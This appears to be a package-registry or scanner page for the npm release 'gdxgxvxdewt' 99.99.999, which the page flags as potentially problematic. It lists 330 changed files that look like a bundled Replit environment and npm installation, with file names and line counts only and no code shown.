gdxgxvxdewt 99.99.999

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of gdxgxvxdewt might be problematic. Click here for more details.

Files changed (2284) hide show
  1. package/.cache/replit/__replit_disk_meta.json +1 -0
  2. package/.cache/replit/modules.stamp +1 -0
  3. package/.cache/replit/nix/env.json +1 -0
  4. package/.config/configstore/update-notifier-npm.json +4 -0
  5. package/.config/configstore/update-notifier-npm.json.1735545094 +4 -0
  6. package/.config/npm/node_global/lib/node_modules/metaflow-ui/.cache/replit/__replit_disk_meta.json +1 -0
  7. package/.config/npm/node_global/lib/node_modules/metaflow-ui/.cache/replit/modules.stamp +1 -0
  8. package/.config/npm/node_global/lib/node_modules/metaflow-ui/.cache/replit/nix/env.json +1 -0
  9. package/.config/npm/node_global/lib/node_modules/metaflow-ui/.config/configstore/update-notifier-npm.json +10 -0
  10. package/.config/npm/node_global/lib/node_modules/metaflow-ui/.config/configstore/update-notifier-npm.json.1735545094 +4 -0
  11. package/.config/npm/node_global/lib/node_modules/metaflow-ui/.replit +89 -0
  12. package/.config/npm/node_global/lib/node_modules/metaflow-ui/.upm/store.json +1 -0
  13. package/.config/npm/node_global/lib/node_modules/metaflow-ui/index.js +0 -0
  14. package/.config/npm/node_global/lib/node_modules/metaflow-ui/package.json +12 -0
  15. package/.config/npm/node_global/lib/node_modules/metaflow-ui/replit.nix +8 -0
  16. package/.config/npm/node_global/lib/node_modules/npm/LICENSE +235 -0
  17. package/.config/npm/node_global/lib/node_modules/npm/README.md +64 -0
  18. package/.config/npm/node_global/lib/node_modules/npm/bin/npm +64 -0
  19. package/.config/npm/node_global/lib/node_modules/npm/bin/npm-cli.js +2 -0
  20. package/.config/npm/node_global/lib/node_modules/npm/bin/npm.cmd +19 -0
  21. package/.config/npm/node_global/lib/node_modules/npm/bin/npm.ps1 +35 -0
  22. package/.config/npm/node_global/lib/node_modules/npm/bin/npx +65 -0
  23. package/.config/npm/node_global/lib/node_modules/npm/bin/npx-cli.js +130 -0
  24. package/.config/npm/node_global/lib/node_modules/npm/bin/npx.cmd +20 -0
  25. package/.config/npm/node_global/lib/node_modules/npm/bin/npx.ps1 +35 -0
  26. package/.config/npm/node_global/lib/node_modules/npm/docs/README.md +5 -0
  27. package/.config/npm/node_global/lib/node_modules/npm/docs/content/commands/npm-access.md +123 -0
  28. package/.config/npm/node_global/lib/node_modules/npm/docs/content/commands/npm-adduser.md +86 -0
  29. package/.config/npm/node_global/lib/node_modules/npm/docs/content/commands/npm-audit.md +439 -0
  30. package/.config/npm/node_global/lib/node_modules/npm/docs/content/commands/npm-bugs.md +109 -0
  31. package/.config/npm/node_global/lib/node_modules/npm/docs/content/commands/npm-cache.md +94 -0
  32. package/.config/npm/node_global/lib/node_modules/npm/docs/content/commands/npm-ci.md +303 -0
  33. package/.config/npm/node_global/lib/node_modules/npm/docs/content/commands/npm-completion.md +41 -0
  34. package/.config/npm/node_global/lib/node_modules/npm/docs/content/commands/npm-config.md +181 -0
  35. package/.config/npm/node_global/lib/node_modules/npm/docs/content/commands/npm-dedupe.md +306 -0
  36. package/.config/npm/node_global/lib/node_modules/npm/docs/content/commands/npm-deprecate.md +73 -0
  37. package/.config/npm/node_global/lib/node_modules/npm/docs/content/commands/npm-diff.md +316 -0
  38. package/.config/npm/node_global/lib/node_modules/npm/docs/content/commands/npm-dist-tag.md +154 -0
  39. package/.config/npm/node_global/lib/node_modules/npm/docs/content/commands/npm-docs.md +108 -0
  40. package/.config/npm/node_global/lib/node_modules/npm/docs/content/commands/npm-doctor.md +122 -0
  41. package/.config/npm/node_global/lib/node_modules/npm/docs/content/commands/npm-edit.md +46 -0
  42. package/.config/npm/node_global/lib/node_modules/npm/docs/content/commands/npm-exec.md +366 -0
  43. package/.config/npm/node_global/lib/node_modules/npm/docs/content/commands/npm-explain.md +105 -0
  44. package/.config/npm/node_global/lib/node_modules/npm/docs/content/commands/npm-explore.md +49 -0
  45. package/.config/npm/node_global/lib/node_modules/npm/docs/content/commands/npm-find-dupes.md +232 -0
  46. package/.config/npm/node_global/lib/node_modules/npm/docs/content/commands/npm-fund.md +145 -0
  47. package/.config/npm/node_global/lib/node_modules/npm/docs/content/commands/npm-help-search.md +40 -0
  48. package/.config/npm/node_global/lib/node_modules/npm/docs/content/commands/npm-help.md +46 -0
  49. package/.config/npm/node_global/lib/node_modules/npm/docs/content/commands/npm-hook.md +112 -0
  50. package/.config/npm/node_global/lib/node_modules/npm/docs/content/commands/npm-init.md +299 -0
  51. package/.config/npm/node_global/lib/node_modules/npm/docs/content/commands/npm-install-ci-test.md +250 -0
  52. package/.config/npm/node_global/lib/node_modules/npm/docs/content/commands/npm-install-test.md +327 -0
  53. package/.config/npm/node_global/lib/node_modules/npm/docs/content/commands/npm-install.md +763 -0
  54. package/.config/npm/node_global/lib/node_modules/npm/docs/content/commands/npm-link.md +382 -0
  55. package/.config/npm/node_global/lib/node_modules/npm/docs/content/commands/npm-login.md +93 -0
  56. package/.config/npm/node_global/lib/node_modules/npm/docs/content/commands/npm-logout.md +75 -0
  57. package/.config/npm/node_global/lib/node_modules/npm/docs/content/commands/npm-ls.md +280 -0
  58. package/.config/npm/node_global/lib/node_modules/npm/docs/content/commands/npm-org.md +114 -0
  59. package/.config/npm/node_global/lib/node_modules/npm/docs/content/commands/npm-outdated.md +178 -0
  60. package/.config/npm/node_global/lib/node_modules/npm/docs/content/commands/npm-owner.md +106 -0
  61. package/.config/npm/node_global/lib/node_modules/npm/docs/content/commands/npm-pack.md +126 -0
  62. package/.config/npm/node_global/lib/node_modules/npm/docs/content/commands/npm-ping.md +46 -0
  63. package/.config/npm/node_global/lib/node_modules/npm/docs/content/commands/npm-pkg.md +273 -0
  64. package/.config/npm/node_global/lib/node_modules/npm/docs/content/commands/npm-prefix.md +59 -0
  65. package/.config/npm/node_global/lib/node_modules/npm/docs/content/commands/npm-profile.md +131 -0
  66. package/.config/npm/node_global/lib/node_modules/npm/docs/content/commands/npm-prune.md +183 -0
  67. package/.config/npm/node_global/lib/node_modules/npm/docs/content/commands/npm-publish.md +235 -0
  68. package/.config/npm/node_global/lib/node_modules/npm/docs/content/commands/npm-query.md +212 -0
  69. package/.config/npm/node_global/lib/node_modules/npm/docs/content/commands/npm-rebuild.md +153 -0
  70. package/.config/npm/node_global/lib/node_modules/npm/docs/content/commands/npm-repo.md +102 -0
  71. package/.config/npm/node_global/lib/node_modules/npm/docs/content/commands/npm-restart.md +70 -0
  72. package/.config/npm/node_global/lib/node_modules/npm/docs/content/commands/npm-root.md +51 -0
  73. package/.config/npm/node_global/lib/node_modules/npm/docs/content/commands/npm-run-script.md +253 -0
  74. package/.config/npm/node_global/lib/node_modules/npm/docs/content/commands/npm-search.md +159 -0
  75. package/.config/npm/node_global/lib/node_modules/npm/docs/content/commands/npm-shrinkwrap.md +32 -0
  76. package/.config/npm/node_global/lib/node_modules/npm/docs/content/commands/npm-star.md +78 -0
  77. package/.config/npm/node_global/lib/node_modules/npm/docs/content/commands/npm-stars.md +40 -0
  78. package/.config/npm/node_global/lib/node_modules/npm/docs/content/commands/npm-start.md +80 -0
  79. package/.config/npm/node_global/lib/node_modules/npm/docs/content/commands/npm-stop.md +73 -0
  80. package/.config/npm/node_global/lib/node_modules/npm/docs/content/commands/npm-team.md +155 -0
  81. package/.config/npm/node_global/lib/node_modules/npm/docs/content/commands/npm-test.md +70 -0
  82. package/.config/npm/node_global/lib/node_modules/npm/docs/content/commands/npm-token.md +130 -0
  83. package/.config/npm/node_global/lib/node_modules/npm/docs/content/commands/npm-uninstall.md +159 -0
  84. package/.config/npm/node_global/lib/node_modules/npm/docs/content/commands/npm-unpublish.md +133 -0
  85. package/.config/npm/node_global/lib/node_modules/npm/docs/content/commands/npm-unstar.md +74 -0
  86. package/.config/npm/node_global/lib/node_modules/npm/docs/content/commands/npm-update.md +432 -0
  87. package/.config/npm/node_global/lib/node_modules/npm/docs/content/commands/npm-version.md +235 -0
  88. package/.config/npm/node_global/lib/node_modules/npm/docs/content/commands/npm-view.md +193 -0
  89. package/.config/npm/node_global/lib/node_modules/npm/docs/content/commands/npm-whoami.md +41 -0
  90. package/.config/npm/node_global/lib/node_modules/npm/docs/content/commands/npm.md +175 -0
  91. package/.config/npm/node_global/lib/node_modules/npm/docs/content/commands/npx.md +167 -0
  92. package/.config/npm/node_global/lib/node_modules/npm/docs/content/configuring-npm/folders.md +219 -0
  93. package/.config/npm/node_global/lib/node_modules/npm/docs/content/configuring-npm/install.md +78 -0
  94. package/.config/npm/node_global/lib/node_modules/npm/docs/content/configuring-npm/npm-shrinkwrap-json.md +34 -0
  95. package/.config/npm/node_global/lib/node_modules/npm/docs/content/configuring-npm/npmrc.md +137 -0
  96. package/.config/npm/node_global/lib/node_modules/npm/docs/content/configuring-npm/package-json.md +1172 -0
  97. package/.config/npm/node_global/lib/node_modules/npm/docs/content/configuring-npm/package-lock-json.md +235 -0
  98. package/.config/npm/node_global/lib/node_modules/npm/docs/content/using-npm/config.md +1972 -0
  99. package/.config/npm/node_global/lib/node_modules/npm/docs/content/using-npm/dependency-selectors.md +207 -0
  100. package/.config/npm/node_global/lib/node_modules/npm/docs/content/using-npm/developers.md +245 -0
  101. package/.config/npm/node_global/lib/node_modules/npm/docs/content/using-npm/logging.md +96 -0
  102. package/.config/npm/node_global/lib/node_modules/npm/docs/content/using-npm/orgs.md +93 -0
  103. package/.config/npm/node_global/lib/node_modules/npm/docs/content/using-npm/package-spec.md +105 -0
  104. package/.config/npm/node_global/lib/node_modules/npm/docs/content/using-npm/registry.md +86 -0
  105. package/.config/npm/node_global/lib/node_modules/npm/docs/content/using-npm/removal.md +64 -0
  106. package/.config/npm/node_global/lib/node_modules/npm/docs/content/using-npm/scope.md +143 -0
  107. package/.config/npm/node_global/lib/node_modules/npm/docs/content/using-npm/scripts.md +370 -0
  108. package/.config/npm/node_global/lib/node_modules/npm/docs/content/using-npm/workspaces.md +226 -0
  109. package/.config/npm/node_global/lib/node_modules/npm/docs/output/commands/npm-access.html +262 -0
  110. package/.config/npm/node_global/lib/node_modules/npm/docs/output/commands/npm-adduser.html +218 -0
  111. package/.config/npm/node_global/lib/node_modules/npm/docs/output/commands/npm-audit.html +481 -0
  112. package/.config/npm/node_global/lib/node_modules/npm/docs/output/commands/npm-bugs.html +243 -0
  113. package/.config/npm/node_global/lib/node_modules/npm/docs/output/commands/npm-cache.html +236 -0
  114. package/.config/npm/node_global/lib/node_modules/npm/docs/output/commands/npm-ci.html +388 -0
  115. package/.config/npm/node_global/lib/node_modules/npm/docs/output/commands/npm-completion.html +186 -0
  116. package/.config/npm/node_global/lib/node_modules/npm/docs/output/commands/npm-config.html +282 -0
  117. package/.config/npm/node_global/lib/node_modules/npm/docs/output/commands/npm-dedupe.html +386 -0
  118. package/.config/npm/node_global/lib/node_modules/npm/docs/output/commands/npm-deprecate.html +206 -0
  119. package/.config/npm/node_global/lib/node_modules/npm/docs/output/commands/npm-diff.html +398 -0
  120. package/.config/npm/node_global/lib/node_modules/npm/docs/output/commands/npm-dist-tag.html +281 -0
  121. package/.config/npm/node_global/lib/node_modules/npm/docs/output/commands/npm-docs.html +242 -0
  122. package/.config/npm/node_global/lib/node_modules/npm/docs/output/commands/npm-doctor.html +253 -0
  123. package/.config/npm/node_global/lib/node_modules/npm/docs/output/commands/npm-edit.html +190 -0
  124. package/.config/npm/node_global/lib/node_modules/npm/docs/output/commands/npm-exec.html +435 -0
  125. package/.config/npm/node_global/lib/node_modules/npm/docs/output/commands/npm-explain.html +242 -0
  126. package/.config/npm/node_global/lib/node_modules/npm/docs/output/commands/npm-explore.html +190 -0
  127. package/.config/npm/node_global/lib/node_modules/npm/docs/output/commands/npm-find-dupes.html +332 -0
  128. package/.config/npm/node_global/lib/node_modules/npm/docs/output/commands/npm-fund.html +267 -0
  129. package/.config/npm/node_global/lib/node_modules/npm/docs/output/commands/npm-help-search.html +184 -0
  130. package/.config/npm/node_global/lib/node_modules/npm/docs/output/commands/npm-help.html +190 -0
  131. package/.config/npm/node_global/lib/node_modules/npm/docs/output/commands/npm-hook.html +226 -0
  132. package/.config/npm/node_global/lib/node_modules/npm/docs/output/commands/npm-init.html +387 -0
  133. package/.config/npm/node_global/lib/node_modules/npm/docs/output/commands/npm-install-ci-test.html +346 -0
  134. package/.config/npm/node_global/lib/node_modules/npm/docs/output/commands/npm-install-test.html +402 -0
  135. package/.config/npm/node_global/lib/node_modules/npm/docs/output/commands/npm-install.html +764 -0
  136. package/.config/npm/node_global/lib/node_modules/npm/docs/output/commands/npm-link.html +441 -0
  137. package/.config/npm/node_global/lib/node_modules/npm/docs/output/commands/npm-login.html +222 -0
  138. package/.config/npm/node_global/lib/node_modules/npm/docs/output/commands/npm-logout.html +209 -0
  139. package/.config/npm/node_global/lib/node_modules/npm/docs/output/commands/npm-ls.html +369 -0
  140. package/.config/npm/node_global/lib/node_modules/npm/docs/output/commands/npm-org.html +231 -0
  141. package/.config/npm/node_global/lib/node_modules/npm/docs/output/commands/npm-outdated.html +305 -0
  142. package/.config/npm/node_global/lib/node_modules/npm/docs/output/commands/npm-owner.html +243 -0
  143. package/.config/npm/node_global/lib/node_modules/npm/docs/output/commands/npm-pack.html +256 -0
  144. package/.config/npm/node_global/lib/node_modules/npm/docs/output/commands/npm-ping.html +189 -0
  145. package/.config/npm/node_global/lib/node_modules/npm/docs/output/commands/npm-pkg.html +365 -0
  146. package/.config/npm/node_global/lib/node_modules/npm/docs/output/commands/npm-prefix.html +200 -0
  147. package/.config/npm/node_global/lib/node_modules/npm/docs/output/commands/npm-profile.html +272 -0
  148. package/.config/npm/node_global/lib/node_modules/npm/docs/output/commands/npm-prune.html +296 -0
  149. package/.config/npm/node_global/lib/node_modules/npm/docs/output/commands/npm-publish.html +350 -0
  150. package/.config/npm/node_global/lib/node_modules/npm/docs/output/commands/npm-query.html +344 -0
  151. package/.config/npm/node_global/lib/node_modules/npm/docs/output/commands/npm-rebuild.html +277 -0
  152. package/.config/npm/node_global/lib/node_modules/npm/docs/output/commands/npm-repo.html +236 -0
  153. package/.config/npm/node_global/lib/node_modules/npm/docs/output/commands/npm-restart.html +211 -0
  154. package/.config/npm/node_global/lib/node_modules/npm/docs/output/commands/npm-root.html +195 -0
  155. package/.config/npm/node_global/lib/node_modules/npm/docs/output/commands/npm-run-script.html +345 -0
  156. package/.config/npm/node_global/lib/node_modules/npm/docs/output/commands/npm-search.html +272 -0
  157. package/.config/npm/node_global/lib/node_modules/npm/docs/output/commands/npm-shrinkwrap.html +182 -0
  158. package/.config/npm/node_global/lib/node_modules/npm/docs/output/commands/npm-star.html +209 -0
  159. package/.config/npm/node_global/lib/node_modules/npm/docs/output/commands/npm-stars.html +185 -0
  160. package/.config/npm/node_global/lib/node_modules/npm/docs/output/commands/npm-start.html +214 -0
  161. package/.config/npm/node_global/lib/node_modules/npm/docs/output/commands/npm-stop.html +209 -0
  162. package/.config/npm/node_global/lib/node_modules/npm/docs/output/commands/npm-team.html +272 -0
  163. package/.config/npm/node_global/lib/node_modules/npm/docs/output/commands/npm-test.html +207 -0
  164. package/.config/npm/node_global/lib/node_modules/npm/docs/output/commands/npm-token.html +266 -0
  165. package/.config/npm/node_global/lib/node_modules/npm/docs/output/commands/npm-uninstall.html +278 -0
  166. package/.config/npm/node_global/lib/node_modules/npm/docs/output/commands/npm-unpublish.html +263 -0
  167. package/.config/npm/node_global/lib/node_modules/npm/docs/output/commands/npm-unstar.html +206 -0
  168. package/.config/npm/node_global/lib/node_modules/npm/docs/output/commands/npm-update.html +477 -0
  169. package/.config/npm/node_global/lib/node_modules/npm/docs/output/commands/npm-version.html +341 -0
  170. package/.config/npm/node_global/lib/node_modules/npm/docs/output/commands/npm-view.html +293 -0
  171. package/.config/npm/node_global/lib/node_modules/npm/docs/output/commands/npm-whoami.html +185 -0
  172. package/.config/npm/node_global/lib/node_modules/npm/docs/output/commands/npm.html +296 -0
  173. package/.config/npm/node_global/lib/node_modules/npm/docs/output/commands/npx.html +284 -0
  174. package/.config/npm/node_global/lib/node_modules/npm/docs/output/configuring-npm/folders.html +322 -0
  175. package/.config/npm/node_global/lib/node_modules/npm/docs/output/configuring-npm/install.html +217 -0
  176. package/.config/npm/node_global/lib/node_modules/npm/docs/output/configuring-npm/npm-shrinkwrap-json.html +184 -0
  177. package/.config/npm/node_global/lib/node_modules/npm/docs/output/configuring-npm/npmrc.html +261 -0
  178. package/.config/npm/node_global/lib/node_modules/npm/docs/output/configuring-npm/package-json.html +1053 -0
  179. package/.config/npm/node_global/lib/node_modules/npm/docs/output/configuring-npm/package-lock-json.html +390 -0
  180. package/.config/npm/node_global/lib/node_modules/npm/docs/output/using-npm/config.html +1578 -0
  181. package/.config/npm/node_global/lib/node_modules/npm/docs/output/using-npm/dependency-selectors.html +336 -0
  182. package/.config/npm/node_global/lib/node_modules/npm/docs/output/using-npm/developers.html +352 -0
  183. package/.config/npm/node_global/lib/node_modules/npm/docs/output/using-npm/logging.html +228 -0
  184. package/.config/npm/node_global/lib/node_modules/npm/docs/output/using-npm/orgs.html +236 -0
  185. package/.config/npm/node_global/lib/node_modules/npm/docs/output/using-npm/package-spec.html +255 -0
  186. package/.config/npm/node_global/lib/node_modules/npm/docs/output/using-npm/registry.html +226 -0
  187. package/.config/npm/node_global/lib/node_modules/npm/docs/output/using-npm/removal.html +199 -0
  188. package/.config/npm/node_global/lib/node_modules/npm/docs/output/using-npm/scope.html +257 -0
  189. package/.config/npm/node_global/lib/node_modules/npm/docs/output/using-npm/scripts.html +483 -0
  190. package/.config/npm/node_global/lib/node_modules/npm/docs/output/using-npm/workspaces.html +313 -0
  191. package/.config/npm/node_global/lib/node_modules/npm/index.js +5 -0
  192. package/.config/npm/node_global/lib/node_modules/npm/lib/arborist-cmd.js +53 -0
  193. package/.config/npm/node_global/lib/node_modules/npm/lib/base-command.js +165 -0
  194. package/.config/npm/node_global/lib/node_modules/npm/lib/cli-entry.js +74 -0
  195. package/.config/npm/node_global/lib/node_modules/npm/lib/cli.js +4 -0
  196. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/access.js +222 -0
  197. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/adduser.js +51 -0
  198. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/audit.js +506 -0
  199. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/bugs.js +33 -0
  200. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/cache.js +213 -0
  201. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/ci.js +116 -0
  202. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/completion.js +283 -0
  203. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/config.js +378 -0
  204. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/dedupe.js +51 -0
  205. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/deprecate.js +73 -0
  206. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/diff.js +291 -0
  207. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/dist-tag.js +205 -0
  208. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/docs.js +19 -0
  209. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/doctor.js +419 -0
  210. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/edit.js +76 -0
  211. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/exec.js +97 -0
  212. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/explain.js +128 -0
  213. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/explore.js +79 -0
  214. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/find-dupes.js +26 -0
  215. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/fund.js +225 -0
  216. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/get.js +22 -0
  217. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/help-search.js +194 -0
  218. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/help.js +113 -0
  219. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/hook.js +125 -0
  220. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/init.js +242 -0
  221. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/install-ci-test.js +15 -0
  222. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/install-test.js +15 -0
  223. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/install.js +175 -0
  224. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/link.js +191 -0
  225. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/ll.js +13 -0
  226. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/login.js +51 -0
  227. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/logout.js +45 -0
  228. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/ls.js +572 -0
  229. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/org.js +155 -0
  230. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/outdated.js +369 -0
  231. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/owner.js +232 -0
  232. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/pack.js +83 -0
  233. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/ping.js +29 -0
  234. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/pkg.js +149 -0
  235. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/prefix.js +13 -0
  236. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/profile.js +407 -0
  237. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/prune.js +32 -0
  238. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/publish.js +218 -0
  239. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/query.js +109 -0
  240. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/rebuild.js +82 -0
  241. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/repo.js +54 -0
  242. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/restart.js +13 -0
  243. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/root.js +11 -0
  244. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/run-script.js +263 -0
  245. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/search.js +110 -0
  246. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/set.js +25 -0
  247. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/shrinkwrap.js +71 -0
  248. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/star.js +71 -0
  249. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/stars.js +38 -0
  250. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/start.js +13 -0
  251. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/stop.js +13 -0
  252. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/team.js +154 -0
  253. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/test.js +13 -0
  254. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/token.js +229 -0
  255. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/uninstall.js +56 -0
  256. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/unpublish.js +158 -0
  257. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/unstar.js +7 -0
  258. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/update.js +68 -0
  259. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/version.js +156 -0
  260. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/view.js +510 -0
  261. package/.config/npm/node_global/lib/node_modules/npm/lib/commands/whoami.js +16 -0
  262. package/.config/npm/node_global/lib/node_modules/npm/lib/es6/validate-engines.js +49 -0
  263. package/.config/npm/node_global/lib/node_modules/npm/lib/lifecycle-cmd.js +19 -0
  264. package/.config/npm/node_global/lib/node_modules/npm/lib/npm.js +483 -0
  265. package/.config/npm/node_global/lib/node_modules/npm/lib/package-url-cmd.js +65 -0
  266. package/.config/npm/node_global/lib/node_modules/npm/lib/utils/ansi-trim.js +3 -0
  267. package/.config/npm/node_global/lib/node_modules/npm/lib/utils/audit-error.js +40 -0
  268. package/.config/npm/node_global/lib/node_modules/npm/lib/utils/auth.js +100 -0
  269. package/.config/npm/node_global/lib/node_modules/npm/lib/utils/cmd-list.js +177 -0
  270. package/.config/npm/node_global/lib/node_modules/npm/lib/utils/completion/installed-deep.js +45 -0
  271. package/.config/npm/node_global/lib/node_modules/npm/lib/utils/completion/installed-shallow.js +19 -0
  272. package/.config/npm/node_global/lib/node_modules/npm/lib/utils/completion.fish +40 -0
  273. package/.config/npm/node_global/lib/node_modules/npm/lib/utils/completion.sh +70 -0
  274. package/.config/npm/node_global/lib/node_modules/npm/lib/utils/did-you-mean.js +40 -0
  275. package/.config/npm/node_global/lib/node_modules/npm/lib/utils/display.js +126 -0
  276. package/.config/npm/node_global/lib/node_modules/npm/lib/utils/error-message.js +435 -0
  277. package/.config/npm/node_global/lib/node_modules/npm/lib/utils/exit-handler.js +227 -0
  278. package/.config/npm/node_global/lib/node_modules/npm/lib/utils/explain-dep.js +135 -0
  279. package/.config/npm/node_global/lib/node_modules/npm/lib/utils/explain-eresolve.js +71 -0
  280. package/.config/npm/node_global/lib/node_modules/npm/lib/utils/format-bytes.js +30 -0
  281. package/.config/npm/node_global/lib/node_modules/npm/lib/utils/format-search-stream.js +161 -0
  282. package/.config/npm/node_global/lib/node_modules/npm/lib/utils/get-identity.js +26 -0
  283. package/.config/npm/node_global/lib/node_modules/npm/lib/utils/is-windows.js +6 -0
  284. package/.config/npm/node_global/lib/node_modules/npm/lib/utils/log-file.js +236 -0
  285. package/.config/npm/node_global/lib/node_modules/npm/lib/utils/log-shim.js +59 -0
  286. package/.config/npm/node_global/lib/node_modules/npm/lib/utils/npm-usage.js +74 -0
  287. package/.config/npm/node_global/lib/node_modules/npm/lib/utils/open-url-prompt.js +70 -0
  288. package/.config/npm/node_global/lib/node_modules/npm/lib/utils/open-url.js +50 -0
  289. package/.config/npm/node_global/lib/node_modules/npm/lib/utils/otplease.js +48 -0
  290. package/.config/npm/node_global/lib/node_modules/npm/lib/utils/ping.js +7 -0
  291. package/.config/npm/node_global/lib/node_modules/npm/lib/utils/pulse-till-done.js +26 -0
  292. package/.config/npm/node_global/lib/node_modules/npm/lib/utils/queryable.js +312 -0
  293. package/.config/npm/node_global/lib/node_modules/npm/lib/utils/read-user-info.js +68 -0
  294. package/.config/npm/node_global/lib/node_modules/npm/lib/utils/reify-finish.js +33 -0
  295. package/.config/npm/node_global/lib/node_modules/npm/lib/utils/reify-output.js +185 -0
  296. package/.config/npm/node_global/lib/node_modules/npm/lib/utils/replace-info.js +31 -0
  297. package/.config/npm/node_global/lib/node_modules/npm/lib/utils/tar.js +132 -0
  298. package/.config/npm/node_global/lib/node_modules/npm/lib/utils/timers.js +116 -0
  299. package/.config/npm/node_global/lib/node_modules/npm/lib/utils/update-notifier.js +125 -0
  300. package/.config/npm/node_global/lib/node_modules/npm/lib/utils/validate-lockfile.js +29 -0
  301. package/.config/npm/node_global/lib/node_modules/npm/lib/utils/web-auth.js +20 -0
  302. package/.config/npm/node_global/lib/node_modules/npm/lib/workspaces/get-workspaces.js +54 -0
  303. package/.config/npm/node_global/lib/node_modules/npm/lib/workspaces/update-workspaces.js +40 -0
  304. package/.config/npm/node_global/lib/node_modules/npm/man/man1/npm-access.1 +115 -0
  305. package/.config/npm/node_global/lib/node_modules/npm/man/man1/npm-adduser.1 +91 -0
  306. package/.config/npm/node_global/lib/node_modules/npm/man/man1/npm-audit.1 +419 -0
  307. package/.config/npm/node_global/lib/node_modules/npm/man/man1/npm-bugs.1 +115 -0
  308. package/.config/npm/node_global/lib/node_modules/npm/man/man1/npm-cache.1 +78 -0
  309. package/.config/npm/node_global/lib/node_modules/npm/man/man1/npm-ci.1 +275 -0
  310. package/.config/npm/node_global/lib/node_modules/npm/man/man1/npm-completion.1 +35 -0
  311. package/.config/npm/node_global/lib/node_modules/npm/man/man1/npm-config.1 +187 -0
  312. package/.config/npm/node_global/lib/node_modules/npm/man/man1/npm-dedupe.1 +276 -0
  313. package/.config/npm/node_global/lib/node_modules/npm/man/man1/npm-deprecate.1 +73 -0
  314. package/.config/npm/node_global/lib/node_modules/npm/man/man1/npm-diff.1 +307 -0
  315. package/.config/npm/node_global/lib/node_modules/npm/man/man1/npm-dist-tag.1 +144 -0
  316. package/.config/npm/node_global/lib/node_modules/npm/man/man1/npm-docs.1 +113 -0
  317. package/.config/npm/node_global/lib/node_modules/npm/man/man1/npm-doctor.1 +82 -0
  318. package/.config/npm/node_global/lib/node_modules/npm/man/man1/npm-edit.1 +43 -0
  319. package/.config/npm/node_global/lib/node_modules/npm/man/man1/npm-exec.1 +350 -0
  320. package/.config/npm/node_global/lib/node_modules/npm/man/man1/npm-explain.1 +118 -0
  321. package/.config/npm/node_global/lib/node_modules/npm/man/man1/npm-explore.1 +49 -0
  322. package/.config/npm/node_global/lib/node_modules/npm/man/man1/npm-find-dupes.1 +211 -0
  323. package/.config/npm/node_global/lib/node_modules/npm/man/man1/npm-fund.1 +142 -0
  324. package/.config/npm/node_global/lib/node_modules/npm/man/man1/npm-help-search.1 +37 -0
  325. package/.config/npm/node_global/lib/node_modules/npm/man/man1/npm-help.1 +47 -0
  326. package/.config/npm/node_global/lib/node_modules/npm/man/man1/npm-hook.1 +115 -0
  327. package/.config/npm/node_global/lib/node_modules/npm/man/man1/npm-init.1 +316 -0
  328. package/.config/npm/node_global/lib/node_modules/npm/man/man1/npm-install-ci-test.1 +225 -0
  329. package/.config/npm/node_global/lib/node_modules/npm/man/man1/npm-install-test.1 +302 -0
  330. package/.config/npm/node_global/lib/node_modules/npm/man/man1/npm-install.1 +718 -0
